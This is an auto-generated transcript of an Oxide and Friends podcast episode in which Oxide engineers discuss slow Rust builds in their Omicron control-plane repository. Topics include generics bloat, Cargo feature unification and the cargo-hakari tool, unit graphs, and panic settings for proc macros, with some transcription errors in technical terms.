Oxide and Friends | Transcript: What's taking so long?!

What's taking so long?!

January 24, 2024 / 01:35:10/S4 E3

Speaker 1: 00:00

This is where we do the intro music? This is the,

Speaker 2: 00:02

oh, yeah. You said you had been working on a rap that you wanted to try out.

Speaker 1: 00:07

You No. I told you that in confidence. That it was a very vulnerable moment.

Speaker 2: 00:14

So if

Speaker 1: 00:14

I were going to wrap anything, it would be this Gen z Bible that I but I think it's you

Speaker 2: 00:19

see the thing that happened.

Speaker 1: 00:20

Oh, that would that

Speaker 2: 00:22

I I I loved it. I went I was gonna try to, like, mix in some Gen z ism, but, like, I would just flub it. But it was delightful.

Speaker 1: 00:29

So the question is, most of my kids told me that, like, dad, you think this is way too funny. I'm like, I do think this is really funny. This is really funny. I thought there was some some great lines in there. I should, folks did not see this.

Speaker 1: 00:44

Did you have a a, favorite verse in there, Adam?

Speaker 2: 00:49

I I think there was, like, we got you fam kind of thing, from the snake that really had me going.

Speaker 1: 00:56

This I did like it when Adam said, and Adam said and said, what is up, my mammals? Go forth and 5 with Minecraft Paradise.

Speaker 2: 01:04

Go forth and 5.

Speaker 1: 01:05

There's there's so much good stuff in here. Yeah. And then the, the the the divine g caught them in 4 k and said, bra.

Speaker 2: 01:22

I I, you know, I didn't tell my own, my son because, like, I also found it way too amusing, and

Speaker 1: 01:29

I think he would've been really off put by how funny I thought it was. Yes. You well, you you picked wisely. I I did not pick wisely, and I just thought it was way too funny and really insisted on reading on reading way too many verses aloud to my own children.

Speaker 2: 01:42

Where where did this book come from?

Speaker 1: 01:44

Our colleague Aaron. I earn Aaron. Oh, nice. I I guess his maybe brother showed him this. I I've got no idea.

Speaker 1: 01:51

I don't know where this this miss mythical thing came from. And and a a bunch of people were like, show me the rest. I'm like, oh, god. All I've got is one page. I don't know.

Speaker 1: 01:59

It's it's really amazing. It was a bit of a debate in this house and in our house about who wrote it, what generation wrote it. And my kids in particular believe that, like, no self respecting Zoomer wrote this. This is not Gen Z. This has got it it this is where do you my kids troll me by calling me a boomer, and it really does successfully troll me.

Speaker 1: 02:20

I'm really angry about how successfully trolled I get every single time. They're like, what

Speaker 2: 02:24

if ARP is kinda nipping at your heels these days anyway.

Speaker 1: 02:27

ARP is nipping at my heels. He's like, one of you boomers shot it. I'm like, it's a your room. Here. Sorry.

Speaker 1: 02:36

I I I'm wild times. Welcome. We got, Rain here, Rain Paharia, and Sean Klein, and Steve Klabnik, to talk a a hot topic, compile times. Adam, I thought we may give a just an intro to this about our personal journey through compile times. And maybe this is, like, part of the problem is that you and I have our expectations set too low from do you agree with me that we can

Speaker 2: 03:03

No. Dovetailing perfectly from the generational conversation. No. I agree with you. I mean, it is I think it it bears explanation that, you know, my first job, your first job was at at Sun Microsystems working on the Slayers kernel, and the script to build the thing is called nightly.

Speaker 2: 03:20

Nightly. Which which tell which tells you the frequency at which it is expected to complete.

Speaker 1: 03:27

And at one particular dark moment in Sun's history, it took more than 24 hours to compile. To compile absolutely everything. Yeah. On this is considered to be a low point in term in many different dimensions in terms of, like because there's a little bit of, like, your ratio of, like, system complexity to, like, to system performance is clearly, you overburden the system when it takes more than so, yeah, I mean, that was kind of our coming with we're just you get used to very certainly to build everything just takes a long time. And you also just get really used to doing, doing a lot and kind of, like, pencil and paper.

Speaker 1: 04:03

But that's really not the way I mean, there's much of other software we developed where we love those quick iterations, and the quick iteration becomes really important. And so I confess that when, like, I kinda liked I mean, like, it's a bit too strong, but the fact that Rust did take a long time to compile, it just felt like it's doing it's like the computer's doing work. It's it's taking a long time to compile because it's solving really hard problems for me. I I kinda thought it was great. This is really pathetic.

Speaker 1: 04:30

It's like stopping I I I think times.

Speaker 2: 04:32

No. Absolutely. But it also kinda sneaks up on you because it right. For at least most of the things. I mean, everything I've worked on at Oxide, it didn't start off slow.

Speaker 2: 04:41

It got slow. And it and and, you you know, you're you're in the the the pot of water that's, you know, gradually heating up, and it's hard to to notice that you're cooking.

Speaker 1: 04:51

Yeah. And I did I gotta tell you the like, the first time I really got burned by compile times. So it with humility, the debugger for Hubris was taking longer and longer and longer to compile. And that is the one of those things where it's like, I'm just trying to change the output of something. Like, I really like, that thing needs to be one column over to the right.

Speaker 1: 05:07

Like, I really do wanna, like, okay, come on. Like, see what's what does it look like now? What does it look like now? What does it look like now? You really want to do these quick iterations.

Speaker 1: 05:14

And the one of the problems there is, like, anytime you touched anything the way I'd had been kinda architected up to that point, it was it had to rebuild everything. And, you know, sometimes I feel like it's it's great to have new employees join a company because you feel like you need to get things cleaned up because you're embarrassed. And I'm not sure

Speaker 3: 05:35

if you Yeah.

Speaker 2: 05:36

Yeah. Company is coming for dinner.

Speaker 3: 05:37

It's like Hope he's coming for dinner.

Speaker 1: 05:39

I was here for dinner. And I gotta, like, god, like, let's act like it was and so I feel like so Matt Keeter was about to join oxide. I'm like, he can't join with these kind of compile times. Like, this is no good. I gotta like I gotta scramble to make this thing so you can actually.

Speaker 1: 05:53

And so I can't refer if I I'm, right now, Matt, wherever he is, is thinking like, this is the compound that's after

Speaker 2: 06:00

you work on it. Like That was better? Like the what would make you? Like,

Speaker 1: 06:04

It's like, I feel bad for you. But, yeah, it used to be a lot worse because the end end then we made it made it better. But I think you're right. Like, it kind of incrementally gets bad. And then are you kinda wake up and you're like, wow.

Speaker 1: 06:15

This is taking these iterations are taking a long time. And then I think there's also attention with the just the size of the repository. Right? And, you know, we have tended towards not quite a monorepo, but we've got a the Omicron or control plane is a single repository. It's and it's it's big.

Speaker 1: 06:34

So there's there's a lot of compile work that that happens. And I Sean, I don't know. I mean, you've been kinda with with Omicron from its from its very earliest days. So you've kinda felt this thing get And I know this is an an issue that has definitely been under your fingernails and spent a lot of time investigating. Do you kinda wanna talk about your history with respect to Omicron build times?

Speaker 3: 06:56

Yeah. The fact that it is a monorepo is definitely one aspect of it. It I definitely agree with the, like, boiling frog and water sort of, analogy that was being made here just because as we were building it up, I mean, build up a small prototype of a control plane that does a few interactions with a database and that exposes an HTTP interface, like it's not so bad. But then you start to grow it, you add authentication systems, you expand kind of feature set you have as well as how big the interfaces that you're exposing and how you're communicating between a lot of different services. Like it just gets not only do the build times grow but it's a lot harder to see and to make it clear which changes are making things worse and where things are slowing down.

Speaker 3: 07:38

So, I don't know, it sort of became a problem of like, especially getting kind of crossing a certain threshold of not only improving the build speed was a big factor, but also making sure that we could actually interrogate the build and figure out what different aspects of it are causing it to be slower or faster or like what are the different ways that we are building it? Because building the building the entire control plane under test is very different for building the entire control plane under, getting ready for production versus building it if sometimes the developers use, cargo check commands, which don't actually produce artifacts. But they can still do type checking and give you a lot of quick feedback. And each one of these different flavors and different ways to build has, you know, different settings and different parameters and that's something that RAIN actually kind of uncovered pretty recently. It was a big winning point that was unifying a lot of that stuff.

Speaker 3: 08:31

But, yeah, that that that sort of aspect of, being able to kind of ask the system why are you taking so long is one of the most important parts of all of this for getting to the bottom of what's going on.

Speaker 1: 08:43

Totally. Yeah. And it well, it also but just kind of before we get to get to some of our methodology there. Because I think the the absolute times do actually matter. Right?

Speaker 1: 08:51

Because it feels like the, you know, once you hit a certain threshold of, like, I'm not gonna sit there and stare at this thing. And I don't know, like, what that threshold is probably different for different people, but somewhere, I don't know, somewhere in, like, the 45 seconds to 3 minutes where you're like, okay. I need to, like, go off and do something else. And then it's like actually, the build time is not 3 minutes. It's actually, like, 38 minutes because you got distracted by something or, you know, you're off on if you're lucky, you're off, like, helping out a colleague or engaged in another productive discussion.

Speaker 1: 09:22

I think if you're many of us, you're more likely, like, how long was I on that Hacker News thread or what have you? And it's like, yeah. Because I left because of the build. It's kinda like you know what I mean? It's like it feels like there's a, I I found that I got much more productive when I set timers for some of the longer things that we need to go do.

Speaker 1: 09:41

And to my timer would go off. They go, okay. Wait a minute. My my my build needs to come out of the oven now. So you mean because, Sean, the absolute times do matter, don't you think?

Speaker 3: 09:50

I totally, totally agree. And this is actually it's a good point of like there's many different types of builds. Like, are you checking out the repo for the first time and doing a build from scratch? Or did you edit one file and you want to see what's going on? Because I heard your comment earlier about, like, you know, coming to coming to Rust and feeling like it's doing things, right?

Speaker 3: 10:09

It's thinking about the build, it's doing borrow checking, it's doing all this fancy stuff that benefits me as a developer. I can empathize with that the first time that you build it. But when you, when you change one file and it's, it's cranking along for, for, as you said changing in small output or changing something that doesn't feel like it should take that long to build, it becomes a lot more frustrating and there's kind of that question of like why? What's going on? Yeah.

Speaker 1: 10:34

And and so, Steve, to give us some history here before we get to reigns big win, the the the used to be I think, like, actually shortly before I came to Rust, there was no incremental compilation whatsoever. Right? I mean, it wasn't there a time when everything had to be rebuilt all of the time?

Speaker 4: 10:49

Yes. And that's like to be clear, that's like, each crate would need to be rebuilt individually. It's like you weren't in that world, you weren't, like, recompiling all of your dependencies every cargo build. It's just that, like, this is actually kind of an interesting thing where we have historically used some terminology that's, like, kind of wrong now because of this because it used to be, like, what is a crate? A crate is a compilation unit because this thing you pass through us see.

Speaker 4: 11:18

But, like, that's not true anymore because then we added incremental compilation and now compilation units could be much smaller. So, like, all that stuff got got tacked on kinda later and makes things a little fuzzy. But, yeah, like, it used to be even worse. Right.

Speaker 1: 11:36

Well, I think it's I used to gather with, like, a lot of things. I mean, I showed up to Rust in 2018, and I feel like a lot of things have just gotten suddenly better or maybe just I've got, like, no self respect, and a high threshold for pain because a lot of things that I think had been pain points were being very quickly alleviated. And

Speaker 4: 11:57

it's it Not an issue of compiled times, but, like, this has been one of my recurring drums throughout, like, the description of early Rust history, like, that I I beat on all the time, which is, like, a lot of the Rubyists who came to Rust in the early days, our function was to tell the systems people you can in fact have nice things. It is in fact possible. Right? Like, because it's kind of the story of cargo in general.

Speaker 1: 12:16

Yeah. Like,

Speaker 4: 12:17

people were skeptical. Well, this is the second cargo because there was, like, 5 different build systems way back then, but this is not about those things right now. But the point is is, like, some people would be, like, yeah, I'm never gonna use that cargo thing because it's a toy, and it can't do real systems programming. And then cargo got shipped, and they were like, oh my god. I'm never writing a make file again.

Speaker 4: 12:33

I their their sun comes out, you know, the birds start singing, you know. So yeah.

Speaker 1: 12:40

You know, it is funny you say that because I do feel like I'd be like, no. No. No. We don't deserve nice things. No.

Speaker 1: 12:44

No. No. We don't deserve it. We've never had it. So no.

Speaker 1: 12:47

No. You can't actually have nice things, actually. And then when you do have nice things, other great things become possible. Adam, do you use voice analyzer? You do.

Speaker 1: 12:56

Right? No.

Speaker 2: 12:56

Yeah. Oh, yeah. I mean, wait. Are you turning the tables on me? Like, I've been I feel like I've been spent the last year and a half trying convince you to use it.

Speaker 2: 13:04

No. I was pretty sure

Speaker 1: 13:05

I was trying to convince you to use it, wasn't I?

Speaker 2: 13:07

What what is going on? This is actually Just some new level of gas lighting. No. No. I I love I I use Rust analyzer.

Speaker 2: 13:14

Like, I don't like looking at code reviews on GitHub because I lack the annotations that that Rust analyzer gives me in in the editor.

Speaker 1: 13:23

Yeah. And I I I I I need to that's clearly, like, amazing, Rust analyzer. And

Speaker 2: 13:29

It is amazing.

Speaker 1: 13:30

Should I use Rust analyzer before or after syntax highlighting if you had to, like, stack rank them?

Speaker 2: 13:34

Oh, Rust analyzer over syntax highlighting all day. It's it's way more useful.

Speaker 1: 13:39

Yeah. No, it seems like it seems like it'd be it'd be very viable.

Speaker 4: 13:42

There was a possible future where Rust analyzer would slowly have eaten the compiler. And then at some point that, dream died. But I still alternate history rests. I kinda wish that that plan had, gone through.

Speaker 1: 13:55

So so elaborate on that, Steve. What does that mean? That means that there is the that Rust analyzer

Speaker 4: 14:00

yeah. So compiler technology has changed a lot since the Dragon book. And so the way that we, like, teach people how compilers work and the way that a lot of people, like, think about compilers is, like, okay. You you lex, you parse, you have some sort of AST, you do transformations AST, you do cogen, you spit it out. But, like, the thing is is that that only works for batch compiling.

Speaker 4: 14:26

And the history of especially tooling is that, one, you need to really deal with the incremental case because we are now, you know, like, running the equivalent of a compiler all the time. And secondly, that, like, you need to handle malformed input better than a compiler. Like, a classic batch AOT compiler, You know, my friend, Tef has this post. He's like, programmers like to read blog posts. Like they do a compiler would read code.

Speaker 4: 14:52

They find the first sentence they disagree with and then bail out and like print an error message. And that's like how classic, you know, batch compilers work. Right? Is like here's my error, and maybe they give you some additional ones, but often they're not that great, and then they go back. But like things like IDE tooling, like it would be really bad experience if you had a typo in your source code and all of the inferred types disappeared from your UI because Rust analyzer could no longer fin figure any of that out.

Speaker 4: 15:19

Right? So we kind of have these, like, 2 different things, like, coming on to compilers. And so, specifically, the, like, Roslyn compiler for c sharp, which eventually kinda ate the classic compiler and replaced it, is based on incrementalism upfront. And so, the Rust's compiler, was written as a very classic batch compiler originally, and now it is a much more complicated amalgamation of kind of sort of both of them. I am not as ex not as knowledgeable about the compiler internals as I used to be, so I don't wanna make too many sweeping statements and say things that are not entirely true, so please take what I say with a grain of salt.

Speaker 4: 15:56

But the point is they added this thing called the query system that's, like, intended to make it more incremental and, like, better at those kinds of things. But you could also make the argument that, like, this doesn't work well unless you start the project that way from the beginning because the techniques that you use to implement all these things work differently based on the arc like, you're you're changing the fundamental architecture of the system. It is just a different system. You know what I mean? So, yeah.

Speaker 1: 16:22

Interesting. Yeah. It's and so being you kind of mentioned, like, the ability to meanwhile, stuck in the the kind of the batch compilation, we we need to have the understanding of where all the time is going. So I guess maybe, Sean, do you wanna talk about, like, some of your explorations, like, said as segue into rain here about where is all the time going? So I I I running cargo build, and, that last step in particular seems to take a long time.

Speaker 1: 16:53

What what's happening there, and what what are some of the tooling that you've used to to figure out what's happening?

Speaker 3: 16:59

Yeah. So, like, the first tool that I'd recommend, if anyone else is building a Rust project and is kind of in a similar position, Argo build has a flag that is dash dash timings that's pretty good and it's pretty well documented. And it can basically give you a build graph, like breakdown crate by crate. What are where where are things being built kind of on a linear timeline, and you can see that output. And that's pretty useful if you're looking at kind of like a which one of my crates are taking the longest time to build.

Speaker 3: 17:30

That that can be particularly useful if you have like, I have a dependency that takes a really long time to build in my small Rust project and it just inflated a lot or I'm, I'm building a bunch of stuff in a workspace, but I'm trying to figure out which one of these crates is the one that's actually the long tail. But that sort of stops at a certain granularity. You really get the which crate is it, and then you kinda stop getting answers at that point. You know, okay. I I can see this crate that takes a long time to build and I'm working on it.

Speaker 3: 17:58

And so, it makes sense that it's rebuilding, but then, like, why that one? What what is actually going on under the hood here? Right. And and this is where I I find the space of, like, optimizing Rust builds really interesting because there are there's not really one answer for where you go next. There's a lot of different answers.

Speaker 3: 18:19

So, there and and there

Speaker 5: 18:23

are a lot of

Speaker 1: 18:24

Always a special kind of challenge, right, when there's a lot of different answers because you people will get a lot of suggestions of what the oh, I think the problem is over here or the problem is over there. It's like, well, you're actually all kind of right to a certain degree, but there's gives you I mean, it's great to have a target rich environment, but it makes it complicated.

Speaker 3: 18:40

Yeah. For sure. There there are a lot of different, like, signals that you can look at, but a lot of them are, like, just just that. Like, they are signals, they're proxies for other data. So, like, a classic one is you can look at tools like cargo LLVM lines or cargo bloat.

Speaker 3: 18:55

Like, those are great ways of saying like, hey, is my what are the aspects of my build that are contributing to a large binary size? But that's kind of that that sometimes helps sometimes helps for finding the spot where your build was actually slower, but it's a proxy. Right? Like, you're saying, I think the things that are really built big, like, that that can help. And that has helped us in several cases where, you know, we used generics in a way that in flated what the compiler was actually working on and, like, those tools helped find those cases.

Speaker 3: 19:23

And then how did you solve

Speaker 1: 19:24

that problem when when you have, like okay. So we're, you know, we're getting more I I mean, or monetize mono monetization than we want. How do we actually go address that or how addressable is that?

Speaker 3: 19:38

Yeah. And so there are a lot of different people who have written about this. And, Steve, I know you also you've you personally worked through this on our our our, drop shot, our HTTP server. But the kind of classic way of doing this is if you still want to have the same function signatures,

Speaker 1: 19:55

like you have a, let's suppose that

Speaker 3: 19:56

you have a function that's generic and it's fully generic, the body generic parameters, whatever the body of the function is, it's just that body. Every single time you call that thing with new generic parameters, you're gonna be creating, basically a new copy of that function. I'm hand wavy because the compiler does different things than that, but that's a rough proxy for how to view it. A really common tool here is you create a very thin shim of a you have a generic version of that function that calls to a not generic function. So your generic call basically becomes a very, very thin call, to a not not generic function, which means that like you you do have a bunch of copies of this generic function, but it's much, much, much smaller.

Speaker 3: 20:42

It's just doing taking your arguments and making a function call with it. Sometimes that's possible and sometimes that's not possible or it's very, very painful to refactor code to be able to do that.

Speaker 1: 20:53

And have you found that you and presumably a a small fraction of these give you the biggest possible wins? I would assume it would be, I mean, did you find that you can get big wins doing this?

Speaker 3: 21:05

In certain cases, I I hate to do this because it's like yeah. Go for it, Steve.

Speaker 5: 21:10

I was

Speaker 4: 21:10

gonna say I linked the PR that Sean was referencing a minute ago in the chat. It is a minus what is this? Minus 4 plus, like, 8 line PR, 10 line PR that, resulted in, like, 5 seconds being knocked off the build times of Omicron. So

Speaker 1: 21:27

Yeah. So pretty much. You get

Speaker 4: 21:28

great, like, pretty significant leverage.

Speaker 5: 21:30

Of course,

Speaker 4: 21:30

this is always, subject to things. This is based off of a optimization called outlining that compilers do. You're basically doing the compilers job for it deliberately. And so sometimes, like all optimizations, it's better and sometimes it's worse.

Speaker 3: 21:43

Yeah. Going through this experience has honestly it has like changed my mind with respect to generics before fighting compile times. I was so excited about generics and Rust for the ability to have, like, good expressibility of different types. You know, being able to really have unique types that represent different things and and fully exploring that part of the type system. But after going through this aspect of build times, I still I still appreciate that, but it's definitely with a very very, solid grain of salt.

Speaker 3: 22:08

Interesting. Where Yeah.

Speaker 1: 22:10

These

Speaker 3: 22:10

things have a cost. And in in the case that Steve linked, I think that's actually a a great example of where it, like, where it worked best. Right? Because that's a case where, we basically had each one of these endpoints that was a generic thing and the the body of it could be separated out. But depending on how you're passing around generic parameters, it's not always possible to make these refactors.

Speaker 3: 22:31

Like, Steve, I remember you and I worked together on trying to change the generic parameters of one of our crates, and we just couldn't detangle the level of generics that was happening there. Yeah. Because it wasn't as simple as, like, the body was could be made not generic and the the the signature was like it just there were generics that were being passed through for very legitimate reasons. But, yeah, sort of as in many ways also made me more comfortable with the idea of using very judiciously crate objects where it's appropriate.

Speaker 4: 23:05

I also need to, like, confess briefly that part of this part of the attitude that Sean is expressing is, like, kind of my fault because I basically, like, put in the book and told everybody and was part of that early culture of, like, always use generics and not trade objects, always use generic and not trade objects, and we didn't, like, do as good of a job of describing the balance. I still think that ultimately that's, like, the right call, but I think that many people don't fully appreciate the trade off partially because of, like, history, and I didn't do a good job of explaining it. So

Speaker 1: 23:42

Yeah. So, like, you're are you gonna have a tell all retrospective where you are you gonna this

Speaker 3: 23:46

is gonna be Oh, got it.

Speaker 4: 23:48

I will tell some things as a retrospective all the time, but, of course, not every story gets told.

Speaker 1: 23:54

Right. So, yeah, you need a, to a documentary where you can invest at all. The, is so expand a little bit on, before Steve goes full Robert McNamara on us, could you expand a little bit, Steve, Sean, on what you mean by the trade objects and where where you use that now instead of generics?

Speaker 3: 24:19

Right. So if you're acting on a object in Rust, where you really care that that object implements a trait or a set of traits, you basically have more or less two choices with how you're gonna interact with that object. Let's suppose that you're writing a function that's going to take this thing in. You can make that function generic and operate on a generic imple t version of that trait. Or you can make that function not generic, but it can act on a din version of that trait.

Speaker 3: 24:49

So that can be like a reference to a din object. If you're doing more complex things with a lifetime, you might need to box that object to make sure that you can actually pass it around. But that that's more or less the trade off that I'm I'm discussing here is like like which one of these do you wanna take? Do you wanna do the den object or do you wanna act on the generic? And if you're acting on the generic object, then the compiler can successfully basically take the template that you've provided to it and paste in the appropriate type, as efficiently as possible, at compile time.

Speaker 3: 25:19

Whereas if you go the DIN route, you are adding a layer of indirection, that at runtime will cause an extra lookup more or less that's happening and it will cause, Rust uses fat pointers in this situation. So it's going to keep around, I believe the terminology here is going it still is called a Vtable in in Rust, right?

Speaker 1: 25:38

Or I don't know if

Speaker 3: 25:39

there's different terms

Speaker 1: 25:40

for it.

Speaker 5: 25:40

Yep. Yep.

Speaker 4: 25:41

There the the main significant difference is between the way in which the code is laid out in c plus plus and in Rust, but it's still a vtable and it's still called a vtable in both languages.

Speaker 3: 25:52

Yeah. And so depending on what your situation is, like if you're writing high high high performance code, this can make a difference. I would also throw out that in many situations if you're doing this in code that is also opening a file, communicating over a network, anything like that that the cost of whatever you're doing the choice between the template and the trade object is going to be so so low and so negligible compared to the other work that's ongoing, that it probably won't make that much of a difference. But there is that trade off to be made, right? And there's always that kind of desire to reach for, well, well, you don't wanna set yourself up for something that's harder to optimize later, but that it's sort of that question of are you optimizing your run time?

Speaker 3: 26:34

Are you optimizing your build time? And that classic, at the end of the day, it's kinda speculative until you actually look because who knows? Maybe maybe by having generics, if your your binary size is bigger, you're actually blowing out a cache size. So, but that is sort of the trade off between, which one of these you're you're paying for, the generic route or the trade off their route.

Speaker 1: 26:55

Yeah. The the dog is big in generics as just trying to, like, don't even mention traits. Why are we talking about traits here? The the the runtime cost. You mentioned the runtime cost.

Speaker 1: 27:03

But I also feel, and Sean, to your point about it, in most cases, the actual run time performance difference will be negligible. I do think it it's really important that, one, be quantitative about all of this stuff because some of the things that you think are expensive are not as expensive as you might think. And and, some there are some very, things that are really very costly, elsewhere, which we will you know, in in some one of the one of the things that you said early on is that one of the things that's most frustrating is when you, the programmer, really feel like Rust is doing work it doesn't need to go do. And I feel like that happens most frequently when you do a build, you make a small change, you do another build. It's like, why are we rebuilding that now?

Speaker 1: 27:48

Like, we now seem to be rebuilding a bunch of stuff. And, Ryan, you had one of these very recently that maybe you can go into depth on where you got a lot of stuff being rebuilt that you you felt should not have been being rebuilt. Can you go into a little bit about what that problem was and how you debunked it?

Speaker 5: 28:04

Yeah. So, so I just, I wanna start off by saying that I love cargo. I think cargo is fantastic. Right?

Speaker 1: 28:14

Cargo is now Cargo is moving uncomfortably in its seat. Like, what what's after? What's what's coming next? So Cargo has a lot of, a

Speaker 5: 28:24

lot of really, really useful features for all sorts of open source, scenarios. Like, for example, like, it lets you turn individual bits of a particular crate on or off. It lets you, cross compile. It lets you do, it lets you do, like, many other things that are actually kind of fancy. The thing the thing, though, is that a lot of those features end up actually being pretty decimal for compile times, and I've, at this point, I've spent, like, probably over a year of my, like, dev time, trying to figure out, okay, how do we make this better?

Speaker 5: 29:04

And so, both at my last role at Meta as well as over here, you know, I have spent a long time analyzing. Okay. So so a common situation is that you're in a large workspace or on a repo, whatever you want to call it, and you run cargo build. Right? And then something fails.

Speaker 5: 29:25

Right? Let's say something fails, and then you go and run. And then you want to, okay, you want to rebuild a particular project, so you run or particular create, so you run cargo build dash p with the name of the crate. And all of a sudden, you're not just rebuilding that crate. You're actually rebuilding the entire world.

Speaker 5: 29:44

And the reason that happens is because of the way Cargo works, and specifically Cargo's features feature works. The way Cargo's feature works is that, you specify, like, a set of crates or or a single crate or whatever to build, and it looks at all of the dependencies. And what it does is that, let's say that you have 2 dependencies a and b, and there's a transitive dependency c. Right? Now, let's say that A depends on C with a particular feature, foo, and B depends on C with a particular feature, bar.

Speaker 5: 30:23

Right? Now, what happens is that if you build A and B together, then Cargo will unify those features such that C is built with the features Foo and Bar. But if you build just A separately, then C, then you just build c with foo, and if you build b separately, then you build c with bar. So if you do these 3 builds, you're actually gonna build c 3 times. Now that doesn't sound too bad at first.

Speaker 5: 30:51

Right? But, what happens is that if a if a crate is rebuilt, then all of its dependents are also rebuilt transitively. So as a simple example, the Syncreate, which is widely used in the Rust ecosystem, for syntax parsing, every basically every proc macro uses it. It has, like, 15 or so features. Right?

Speaker 5: 31:17

I don't know the exact number, but it's something like that. Right? And, a lot of crates that depend on SIN actually enable some subset or the other of those 15. So, you know, it's like some proc macros need the ability to, visit the Rust tree. Some proc macros need, like, the ability to, like, serialize and so on.

Speaker 5: 31:35

Right? So now what happens is that you have this essentially, what, 2 to the 15, I think, features, feature sets that could potentially be built. And, so all of a sudden you have this, like, literally combinatorial explosion of feature sets that can be built. And because SYN is so core, every single thing that depends on SYN also gets rebuilt. So all your proc macros get rebuilt, which means that all your proc macros get run again.

Speaker 5: 32:11

So anything that imports those or uses those proc macros gets rebuilt, and so on. It's honestly like, it is kind of a disastrous scenario at the moment. Like, this is, this is like not good at all. And, so that's the world that, you know, kind of when I started looking at the problem, I, kind of, you know, saw. And so, I've built out a whole bunch of tooling, which I can go in more detail about, like, you know, trying to fix this problem and so on.

Speaker 5: 32:40

And, it turns out that, you know, it does work. It fixes the problems. Though, it it ended up actually exposing a whole bunch of other problems that, that we found out while, while, trying to figure out what was going on. Yeah.

Speaker 1: 32:54

Ritu, you could describe the Twinkl just a little bit of detail so people can know where you know, boy, I've got this problem. Like, how

Speaker 2: 33:00

Yeah.

Speaker 1: 33:00

How do I alleviate this? Because it feels, difficult. It feels difficult to alleviate.

Speaker 5: 33:06

Yeah. So alright. So, several years ago, so so I used to a long time ago, I used to work on Firefox. And, so I got pretty intimately familiar with the Mozilla Central repository. And, you know, even after I stopped working, I'd still, like, check it out, browse the source code every so often.

Speaker 5: 33:28

And so when they introduced Rust, a thing that I noticed pretty quickly is that they ran into the exact same issue. And so they introduced what they called a workspace hack crate. And the idea behind the workspace hack crate is that it is this crate that is sitting on the side. It is completely useless, except that for certain dependencies, like, for example, SYN, it actually specifies the union of all possible features, that all, all of the dependencies that use SYN actually end up requiring. And also, every single create in the workspace in Mozilla Central actually depends on this workspace act create.

Speaker 5: 34:12

And so this, you know, this, this solves the problem to the extent that and and this is managed by hand in Mozilla Central as far as I know, and so this solves the problem to the extent that, you know, there's, like, a human that is, like, keeping things up to date because everything depends on workspace hacks. So SIEM always gets filled with the same features. So I ended up writing a bunch of tooling to actually automate this. Cargo Hakari. So this is a, an automated workspace hack manager that I built out, and, it, what it does is it basically looks at all of the dependencies and figures out, okay, here are all of the dependencies outside the workspace that are built in more than one way.

Speaker 5: 35:05

And then it just puts, just adds lines to the workspace, to the workspaces, to the sorry, to the cratescargo.toml saying, okay, build this with the union of all features. So it's it's something that gets automatically managed. It's built to also be used in CI to make sure things are kept up to date and so on. And so, I switched Omicron over to that, a few months ago, Omicron being our control plane monorepo. And, and so, you know, the results of, the results of that were pretty good.

Speaker 5: 35:39

Like, you know, now if you did jump around, and, like, you know, did cargo build, cargo build dash dashpfoo, cargo buildashpebar. And, you know, that did improve build times quite massively. There ended up being a whole bunch more that we needed to do to achieve that, but that was kind of the big thrust of, what we achieved.

Speaker 1: 35:59

Yeah. And that's

Speaker 2: 36:00

great, Rain, just because, one of the pathologies we were seeing in that Omicron repo, is there some kinds of work that people kinda didn't wanna do, like stuff that should be easy but wasn't? Because even doing those narrow kinds of builds took so long. So in taking some of those rapid iterations, Brian, that you were alluding to just weren't rapid. So it's it's been a it's been a big boon.

Speaker 1: 36:24

Yeah. And then I, it it'd been a big boon and a a lateral but then, Rainy, we had an issue where you've you've done all this great work with Cargo Acari, and then we're still rebuilding stuff. You're like, wait a minute. What's I I I fixed this.

Speaker 5: 36:40

Yeah. So,

Speaker 1: 36:41

I feel it's like I've had that feeling a couple of times my career. It's like, how is this? You you are not allowed to be a problem right now because I've already fixed you. So sorry, problem. Did you not get the memo?

Speaker 1: 36:49

You've been fixed. What are you doing still here?

Speaker 5: 36:52

Right. So so that's that, so, you know, like, a coworker filed an issue on me saying, you know, I was expecting Cargo Arcari to fix this, and yet it it seems better, but it isn't actually completely fixed. So so to actually diagnose that, I ended up doing a whole bunch of debugging. The tool I ended up using the most is, cargo actually has this, thing called a unit graph as, an unstable feature. So what you can do with unit graph is alright.

Speaker 5: 37:27

So backing up. Right? The way build systems work is that you have what is called a dependency graph. Right? So you write out a workspace which has these cargo dot toml files.

Speaker 5: 37:39

These cargo dot toml files specify, you know, your dependencies and so on. And then what cargo does as its build system is that it turns this, dependency graph into a more fine grained graph, and that fine grained graph is what is called a unit graph, or, there are other build systems like Buck have this notion as well, and they call that an action graph. So it's basically the same thing. What that ends up doing is that it expresses each step in the build process as an individual atomic step. So, so, for example, let's say you are building a crate, that has a build script.

Speaker 5: 38:21

Right? So the first step for that needs to be compile the build script. The second step is run the build script. And then the third step is compile the actual create, Right? So a single dependency turns into 3 nodes in this unit graph or action graph.

Speaker 5: 38:39

So how do you examine this graph? Because this graph actually seems pretty useful because this will actually tell us which dependencies get rebuilt or why dependencies are getting rebuilt. This graph captures things like, you know, like what settings are used, how builds are done, the features that are enabled, and so on. So, so Cargo does have does let you spit out a unit graph using this dash dash unit graph option. So I ended up basically examining this unit graph by hand and discovered a whole bunch of things that were preventing objects from being reused again.

Speaker 5: 39:19

So one example of a thing that was preventing objects from being reused again is, that we, when we build Omicron, we build it and we ship it with panic equals a bardset. So, going a little background there, by default, you have a Rust program, you panic, and what happens is that you get this back trace. You can actually catch this panic, typically. It isn't meant as an exception handling mechanism, but, you know, in some situations, you can use it as an exception handling mechanism. And that is what is called panic equals unwind.

Speaker 5: 39:58

Now, when we ship Omicron, we actually ship it with a different panic setting, which is panic equals abort. And what that does is that it actually aborts the build rather than simply unwinding it, or aborts the process completely, right? So you get a core dump, which is useful, but otherwise, the entire process dies, and Excuse me. Something must bring it up again, if it's like a service or something. So, we had set panic equals abort for both release and dev builds, but, it turned out that if you're doing a dev build and that dev build has a proc macro or a build script, then that is always built with panic equals unwind.

Speaker 5: 40:44

And the reason that is built with panic equals unwind is that a proc macro is an in process plugin for the Rust compiler. So if a proc macro is built with panic equals abort and the proc macro panics for whatever reason, then Rust c would not exist anymore. So it would not be able to provide a useful error message at all.

Speaker 1: 41:05

Yeah. You know, and Yeah. Rain, we we kinda kicked off talking about, the Gen z book of Genesis, and I really feel like this is where I felt like we all collectively bit the apple on this one where we've got proc macros are amazing, but of because you get to write software that becomes a part of the build process, but there is a cost to that. And that and, of course, like, when you explained it, I'm like, oh, yeah. Of course, that makes sense.

Speaker 1: 41:32

You would not wanna have panic equals abort because then it would be it would be be bad. But, basically, a bug and a proc macro, a panic and a proc macro that you actually want to bail out and have an error message would result in just like a side fault. And

Speaker 5: 41:47

